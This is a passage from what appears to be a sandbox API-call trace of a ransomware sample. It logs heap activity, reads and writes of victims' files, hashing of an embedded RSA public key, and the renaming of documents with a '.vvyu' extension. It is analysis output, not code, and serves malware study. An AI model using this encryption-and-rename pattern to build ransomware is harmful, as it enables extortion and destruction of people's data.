hHeap=0x2c0000) returned 1 [0200.439] GetCurrentThreadId () returned 0x5d8 [0200.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0200.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af61d0 [0200.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42628 [0200.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31bca0 [0200.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0200.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7d70 [0200.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0200.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0200.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.441] GetCurrentThreadId () returned 0x5d8 [0200.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x29dcde8 [0200.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0200.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0200.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7d70 | out: hHeap=0x2c0000) returned 1 [0200.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0200.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7d70 [0200.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0200.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0200.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b60 [0200.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0200.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0200.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0200.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0200.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0200.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0200.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0200.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0200.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b18 [0200.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0200.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0200.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0200.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0200.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0200.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0200.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0200.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b00 [0200.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0200.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0200.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0200.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ba8 [0200.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0200.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6bc0 [0200.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0200.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0200.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0200.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b78 [0200.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0200.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b48 [0200.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0200.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6bd8 [0200.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0200.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b48 [0200.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b78 | out: hHeap=0x2c0000) returned 1 [0200.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0200.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7d70 | out: hHeap=0x2c0000) returned 1 [0200.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0200.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0200.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7630 [0200.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0200.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b18 [0200.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0200.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf6e0 [0200.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b60 | out: hHeap=0x2c0000) returned 1 [0200.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0200.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6bd8 | out: hHeap=0x2c0000) returned 1 [0200.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2adf8f0 [0200.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0200.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x29dcde8 [0200.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0200.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a199e8 [0200.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0200.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af3f88 [0200.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0200.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0200.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0200.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bca0 | out: hHeap=0x2c0000) returned 1 [0200.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0200.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0200.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0200.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a199e8 | out: hHeap=0x2c0000) returned 1 [0200.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8f0 | out: hHeap=0x2c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6bc0 | out: hHeap=0x2c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ba8 | out: hHeap=0x2c0000) returned 1 [0200.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0200.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42628 | out: hHeap=0x2c0000) returned 1 [0200.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0200.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0200.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a058b8 | out: hHeap=0x2c0000) returned 1 [0200.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0200.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0200.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0200.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0200.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0200.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0200.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26668 | out: hHeap=0x2c0000) returned 1 [0200.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0200.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0200.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0200.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a79478 | out: hHeap=0x2c0000) returned 1 [0200.456] WriteFile (in: hFile=0x52c, lpBuffer=0x2afb168*, nNumberOfBytesToWrite=0x72b5, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2afb168*, lpNumberOfBytesWritten=0x2f9fb14*=0x72b5, lpOverlapped=0x0) returned 1 [0200.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2afb168 | out: hHeap=0x2c0000) returned 1 [0200.457] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x72ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.457] WriteFile (in: hFile=0x52c, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0200.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0200.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0200.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0200.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0200.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0200.459] WriteFile (in: hFile=0x52c, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.459] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.459] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.460] CloseHandle (hObject=0x52c) returned 1 [0200.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x2adc6e8 [0200.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e0) returned 0x2af3f88 [0200.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adc6e8 | out: hHeap=0x2c0000) returned 1 [0200.462] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\RAN3RZLWQzdFaTXUwx\\a_eNlZ lSa4B_.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\ran3rzlwqzdfatxuwx\\a_enlz lsa4b_.ppt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\RAN3RZLWQzdFaTXUwx\\a_eNlZ lSa4B_.ppt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\ran3rzlwqzdfatxuwx\\a_enlz lsa4b_.ppt.vvyu")) returned 1 [0200.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.464] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0200.467] FindNextFileW (in: hFindFile=0x2a05e28, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d417990, ftCreationTime.dwHighDateTime=0x1d8a0b3, ftLastAccessTime.dwLowDateTime=0x61264b00, ftLastAccessTime.dwHighDateTime=0x1d8a517, ftLastWriteTime.dwLowDateTime=0x61264b00, ftLastWriteTime.dwHighDateTime=0x1d8a517, nFileSizeHigh=0x0, nFileSizeLow=0xbb0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qSY7qB q Psxa19MFF.pps", cAlternateFileName="QSY7QB~1.PPS")) returned 1 [0200.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x106) returned 0x2a19588 [0200.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.468] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\RAN3RZLWQzdFaTXUwx\\qSY7qB q Psxa19MFF.pps") returned=".pps" [0200.468] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\RAN3RZLWQzdFaTXUwx\\qSY7qB q Psxa19MFF.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\ran3rzlwqzdfatxuwx\\qsy7qb q psxa19mff.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0200.468] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=47886) returned 1 [0200.468] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0200.471] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xbae8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.472] ReadFile (in: hFile=0x52c, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0200.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.474] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.474] ReadFile (in: hFile=0x52c, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xbb0e, lpOverlapped=0x0) returned 1 [0200.475] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a79478 [0200.475] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.475] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.475] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31bca0) returned 1 [0200.476] CryptCreateHash (in: hProv=0x31bca0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0200.476] CryptHashData (hHash=0x2a05d28, pbData=0x2a79478, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.476] CryptGetHashParam (in: hHash=0x2a05d28, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0200.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0200.476] CryptGetHashParam (in: hHash=0x2a05d28, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0200.476] GetLastError () returned 0x0 [0200.476] CryptDestroyHash (hHash=0x2a05d28) returned 1 [0200.476] CryptReleaseContext (hProv=0x31bca0, dwFlags=0x0) returned 1 [0200.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a79478 | out: hHeap=0x2c0000) returned 1 [0200.477] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0200.477] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0200.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0200.477] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0200.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0200.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbb10) returned 0x2afb168 [0200.477] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0200.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a79478 [0200.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0200.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0200.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0200.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a058b8 [0200.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b30 [0200.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2adeb30 [0200.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ba8 [0200.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0200.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6bc0 [0200.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b48 [0200.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0200.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0200.479] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0200.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0200.479] HeapFree (in: 